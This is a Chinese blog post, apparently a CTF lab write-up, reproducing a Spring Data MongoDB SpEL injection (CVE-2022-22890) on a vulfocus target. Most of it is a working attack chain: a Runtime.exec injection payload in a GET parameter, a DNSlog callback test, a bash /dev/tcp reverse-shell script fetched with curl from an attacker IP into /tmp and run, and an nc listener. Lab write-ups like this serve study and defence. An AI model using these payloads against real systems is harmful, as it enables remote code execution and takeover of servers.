【CTF】【cve_2022_22890】Spring Data MongoDB SpEL表达式注入漏洞

漏洞描述

Spring Data MongoDB SpEL Expression injection Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的@Query@Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符.
该漏洞属于0 Click

影响版本

  • >=3.3.0 & <=3.3.4
  • 3.4.0

解决方法: 升级版本.
查看官网版本支持

漏洞复现

采用vulfocus平台上数据.

启动靶机

启动靶机

执行payload安装curl

请求方式: get
请求URL: /
请求参数(payload): ?name=T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('代码').

安装curl:

getRuntime().exec('apt-get update')
getRuntime().exec('apt-get install -y curl')

等待页面刷新完成即可.

测试curl

DNSlog网站: http://www.dnslog.cn/
测试:

getRuntime().exec('curl xxx.dnslog.cn')

访问dnslog
vulfocus官网上的可能是宽带不行,推荐搭建本地靶机.

反弹shell

写这个文章就是为了写这个

采用bash反弹:
文件内容:

bash -c 'exec bash -i >& /dev/tcp/ip/6666 0>&1'

开启服务

在攻击机上使用python开启临时web服务:

python -m http.server 7777

默认能访问的是当前文件夹.

测试访问

使用curl获取文件

getRuntime().exec('curl -o /tmp/1.sh http://139.224.42.111:7777/1.sh')

查看脚本文件是否被获取:
查看是否访问成功
等待页面加载完成即可.

开启监听 执行脚本

开启监控:

nc -lvnp 6666

开启监听

bash执行获取的脚本:

getRuntime().exec('bash /tmp/1.sh')

很快啊:
反弹成功
反弹成功,应用漏洞成功!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值